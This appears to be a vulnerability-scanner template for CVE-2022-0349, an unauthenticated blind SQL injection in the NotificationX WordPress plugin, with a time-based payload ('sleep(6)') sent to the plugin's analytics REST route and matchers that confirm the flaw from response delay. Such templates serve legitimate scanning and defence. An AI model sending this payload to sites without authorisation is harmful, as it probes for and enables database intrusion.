id: CVE-2022-0349

info:
  name: NotificationX WordPress plugin < 2.3.9 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection.
  reference:
    - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
    - https://wordpress.org/plugins/notificationx/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0349
  classification:
    cve-id: CVE-2022-0349
  metadata:
    verified: true
  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx

requests:
  - raw:
      - |
        @timeout: 15s
        POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nx_id=sleep(6) -- x

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "\"data\":{\"success\":true}")'
        condition: and